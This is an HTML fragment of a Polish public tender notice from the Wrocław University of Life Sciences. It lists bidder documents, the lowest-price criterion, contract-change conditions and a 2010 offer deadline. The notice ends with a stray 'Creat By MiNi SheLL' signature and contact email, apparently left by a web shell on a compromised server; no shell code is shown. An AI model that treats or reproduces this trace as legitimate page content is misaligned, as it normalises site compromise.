<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust. 1 ustawy Pzp Zamawiający dopuszcza wprowadzenia istotnych zmian do zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy oraz określa warunki tych zmian poprzez dopuszczenie możliwości zmian umowy w formie pisemnego aneksu dotyczącego w szczególności:
a) przedłużenia terminu realizacji w następujących sytuacjach: 
-  zawieszenia robót przez zamawiającego, 
-  w przypadku warunków atmosferycznych uniemożliwiających przez więcej niż 3 dni wykonywanie robót,
-  z przyczyn nie leżących po stronie Wykonawcy  oraz w przypadku wystąpienia siły wyższej,
- w przypadku konieczności udzielenia zamówień dodatkowych, których nie można było przewidzieć na etapie udzielania zamówienia podstawowego.
b) inne zmiany: 
-  jeżeli  nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ   
   	na realizację przedmiotu zamówienia, w tym przepisów prawa podatkowego i stawki VAT.
-  możliwa jest zmiana umowy w zakresie kluczowego personelu wykonawcy i zamawiającego, za uprzednią zgodą zamawiającego wyrażoną na piśmie, akceptującą kandydata na kluczowe stanowisko, 
-    możliwa jest zmiana umowy w zakresie podwykonawstwa, za uprzednią zgodą zamawiającego: możliwe jest powierzenie podwykonawcom innego zakresu robót niż wskazany w ofercie wykonawcy, a także możliwa zmiana podwykonawcy na etapie realizacji robót o ile nie sprzeciwia się to postanowieniom SIWZ, 
c) Warunki dokonywania zmian: 
-  inicjowanie zmian na wniosek wykonawcy lub zamawiającego, 
-  uzasadnienie zmiany prawidłową realizacją przedmiotu umowy,
 - forma pisemna pod rygorem nieważności w formie aneksu do umowy.
Zmiana umowy dokonana z naruszeniem powyższych zasad podlega unieważnieniu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.up.wroc.pl (zakładka przetargi)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych i Umów Uniwersytetu Przyrodniczego we Wrocławiu, 50-345 Wrocław, ul. Mikulicza-Radeckiego 6, pok. 114..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2010 godzina 10:00, miejsce: Uniwersytet Przyrodniczy we Wrocławiu, Sekretariat Kanclerza, 50-345 Wrocław, ul. Mikulicza-Radeckiego 6, pok. 102.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy niniejszego postępowania.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com